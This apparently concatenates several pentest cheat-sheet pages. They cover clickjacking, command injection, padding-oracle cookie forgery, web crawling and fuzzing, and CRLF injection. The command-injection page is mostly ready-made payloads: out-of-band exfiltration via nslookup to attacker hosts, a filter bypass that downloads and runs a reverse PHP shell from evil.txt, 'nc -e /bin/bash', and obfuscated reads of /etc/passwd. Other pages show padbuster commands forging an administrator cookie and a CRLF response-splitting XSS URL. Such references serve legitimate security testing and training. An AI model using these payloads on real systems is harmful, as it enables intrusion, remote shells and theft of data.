9 |   * X-Frame-Options: deny/sameorigin/allow-from
10 |   * CSP: policy/frame-ancestors 'none/self/domain.com'
11 | {% endhint %}
12 |
13 | ```markup
14 | # An example using the style tag and parameters is as follows:
15 |
16 |
31 |
32 | ...
33 |
34 |
35 | ...decoy web content here...
36 |
37 |
39 |
40 | ```
41 |
42 |
--------------------------------------------------------------------------------
/enumeration/web/command-injection.md:
--------------------------------------------------------------------------------
1 | # Command Injection
2 |
3 | {% hint style="info" %}
4 | Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
5 | {% endhint %}
6 |
7 | ```text
8 | # For detection, try to concatenate another command to param value
9 | &
10 | ;
11 | Newline (0x0a or \n)
12 | &&
13 | |
14 | ||
15 | # like: https://target.com/whatever?param=1|whoami
16 |
17 | # Blind (Time delay)
18 | https://target.com/whatever?param=x||ping+-c+10+127.0.0.1||
19 |
20 | # Blind (Redirect)
21 | https://target.com/whatever?param=x||whoami>/var/www/images/output.txt||
22 |
23 | # Blind (OOB)
24 | https://target.com/whatever?param=x||nslookup+burp.collaborator.address||
25 | https://target.com/whatever?param=x||nslookup+`whoami`.burp.collaborator.address||
26 |
27 | # Common params:
28 | cmd
29 | exec
30 | command
31 | execute
32 | ping
33 | query
34 | jump
35 | code
36 | reg
37 | do
38 | func
39 | arg
40 | option
41 | load
42 | process
43 | step
44 | read
45 | function
46 | req
47 | feature
48 | exe
49 | module
50 | payload
51 | run
52 | print
53 |
54 | # Useful Commands: Linux
55 | whoami
56 | ifconfig
57 | ls
58 | uname -a
59 |
60 | # Useful Commands: Windows
61 | whoami
62 | ipconfig
63 | dir
64 | ver
65 |
66 | # Both Unix and Windows supported
67 | ls||id; ls ||id; ls|| id; ls || id
68 | ls|id; ls |id; ls| id; ls | id
69 | ls&&id; ls &&id; ls&& id; ls && id
70 | ls&id; ls &id; ls& id; ls & id
71 | ls %0A id
72 |
73 | # Time Delay Commands
74 | & ping -c 10 127.0.0.1 &
75 |
76 | # Redirecting output
77 | & whoami > /var/www/images/output.txt &
78 |
79 | # OOB (Out Of Band) Exploitation
80 | & nslookup attacker-server.com &
81 | & nslookup `whoami`.attacker-server.com &
82 |
83 | # WAF bypasses
84 | vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
85 | vuln=127.0.0.1%0anohup nc -e /bin/bash
86 | vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload
87 |
88 | # Some filter bypasses
89 | cat /etc/passwd
90 | cat /e”t”c/pa”s”swd
91 | cat /’e’tc/pa’s’ swd
92 | cat /etc/pa??wd
93 | cat /etc/pa*wd
94 | cat /et’ ‘c/passw’ ‘d
95 | cat /et$()c/pa$()$swd
96 | {cat,/etc/passwd}
97 | cat /???/?????d
98 |
99 | # Tools
100 | https://github.com/commixproject/commix
101 | ```
102 |
103 |
104 |
105 |
--------------------------------------------------------------------------------
/enumeration/web/cookie-padding.md:
--------------------------------------------------------------------------------
1 | # Cookie Padding
2 |
3 | ```bash
4 | # https://github.com/AonCyberLabs/PadBuster
5 | # Get cookie structure
6 | padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
7 | # Get cookie for other user (impersonation)
8 | padbuster http://10.10.119.56/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "hcon=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorhc0nwithyhackme'
9 |
10 | # https://github.com/glebarez/padre
11 | padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='
12 |
13 | # https://github.com/Kibouo/rustpad
14 |
15 | ```
16 |
--------------------------------------------------------------------------------
/enumeration/web/crawl-fuzz.md:
--------------------------------------------------------------------------------
1 | # Crawl/Fuzz
2 |
3 | ```bash
4 | # Crawlers
5 | dirhunt https://url.com/
6 | hakrawler -domain https://url.com/
7 | python3 sourcewolf.py -h
8 | gospider -s "https://example.com/" -o output -c 10 -d 1
9 | gospider -S sites.txt -o output -c 10 -d 1
10 | gospider -s "https://example.com/" -o output -c 10 -d 1 --other-source --include-subs
11 |
12 | # Fuzzers
13 | # ffuf
14 | # Discover content
15 | ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w six2dez/OneListForAll/onelistforall.txt -u https://url.com/FUZZ
16 | # Header discovery
17 | ffuf -mc all -ac -u https://hackxor.net -w six2dez/OneListForAll/onelistforall.txt -c -H "FUZZ: Hellothereheadertesting123 asd"
18 | # Ffuf - burp
19 | ffuf -replay-proxy http://127.0.0.1:8080
20 | # Fuzzing extensions
21 | # General
22 | .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml,.inc
23 | # Backups
24 | '.bak','.bac','.old','.000','.~','.01','._bak','.001','.inc','.Xxx'
25 |
26 | # kr
27 | # https://github.com/assetnote/kiterunner
28 | kr brute https://whatever.com/ -w onelistforallmicro.txt -x 100 --fail-status-codes 404
29 | kr scan https://whatever.com/ -w routes-small.kite -A=apiroutes-210228 -x 100 --ignore-length=34
30 |
31 | # chameleon
32 | # https://github.com/iustin24/chameleon
33 | ./chameleon -u http://testphp.vulnweb.com -a -A
34 |
35 | # Best wordlists for fuzzing:
36 | # https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content
37 | - raft-large-directories-lowercase.txt
38 | - directory-list-2.3-medium.txt
39 | - RobotsDisallowed/top10000.txt
40 | # https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext -
41 | # https://github.com/random-robbie/bruteforce-lists
42 | # https://github.com/google/fuzzing/tree/master/dictionaries
43 | # https://github.com/six2dez/OneListForAll
44 | # AIO: https://github.com/foospidy/payloads
45 | # Check https://wordlists.assetnote.io/
46 |
47 | # Pro tip: set "Host: localhost" as header
48 |
49 | # Custom generated dictionary
50 | gau example.com | unfurl -u paths
51 | # Get files only
52 | sed 's#/#\n#g' paths.txt |sort -u
53 | # Other things
54 | gau example.com | unfurl -u keys
55 | gau example.com | head -n 1000 |fff -s 200 -s 404
56 |
57 | # Hardware devices admin panel
58 | # https://github.com/InfosecMatter/default-http-login-hunter
59 | default-http-login-hunter.sh https://10.10.0.1:443/
60 |
61 | # Dirsearch
62 | dirsearch -r -f -u https://10.11.1.111 --extensions=htm,html,asp,aspx,txt -w six2dez/OneListForAll/onelistforall.txt --request-by-hostname -t 40
63 |
64 | # dirb
65 | dirb http://10.11.1.111 -r -o dirb-10.11.1.111.txt
66 |
67 | # wfuzz
68 | wfuzz -c -z file,six2dez/OneListForAll/onelistforall.txt --hc 404 http://10.11.1.11/FUZZ
69 |
70 | # gobuster
71 | gobuster dir -u http://10.11.1.111 -w six2dez/OneListForAll/onelistforall.txt -s '200,204,301,302,307,403,500' -e
72 |
73 | # Cansina
74 | # https://github.com/deibit/cansina
75 | python3 cansina.py -u example.com -p PAYLOAD
76 |
77 | # Get endpoints from JS
78 | # LinkFinder
79 | # https://github.com/GerbenJavado/LinkFinder
80 | python linkfinder.py -i https://example.com -d
81 | python linkfinder.py -i burpfile -b
82 |
83 | # JS enumeration
84 | # https://github.com/KathanP19/JSFScan.sh
85 |
86 | # Tip, if 429 add one of these headers:
87 | Client-Ip: IP
88 | X-Client-Ip: IP
89 | X-Forwarded-For: IP
90 | X-Forwarded-For: 127.0.0.1
91 | ```
92 |
93 |
--------------------------------------------------------------------------------
/enumeration/web/crlf.md:
--------------------------------------------------------------------------------
1 | # CRLF
2 |
3 | ## Tools
4 |
5 | ```bash
6 | # https://github.com/MichaelStott/CRLF-Injection-Scanner
7 | crlf_scan.py -i -o
8 | # https://github.com/dwisiswant0/crlfuzz
9 | crlfuzz -u "http://target"
10 | # https://github.com/ryandamour/crlfmap
11 | crlfmap scan --domains domains.txt --output results.txt
12 | ```
13 |
14 | ```text
15 | The following simplified example uses CRLF to:
16 |
17 | 1. Add a fake HTTP response header: Content-Length: 0. This causes the web browser to treat this as a terminated response and begin parsing a new response.
18 | 2. Add a fake HTTP response: HTTP/1.1 200 OK. This begins the new response. 19 | 3. Add another fake HTTP response header: Content-Type: text/html. This is needed for the web browser to properly parse the content. 20 | 4. Add yet another fake HTTP response header: Content-Length: 25. This causes the web browser to only parse the next 25 bytes. 21 | 5. Add page content with an XSS: . This content has exactly 25 bytes. 22 | 6. Because of the Content-Length header, the web browser ignores the original content that comes from the web server. 23 | 24 | http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E 25 | 26 | - Cloudflare CRLF bypass 27 |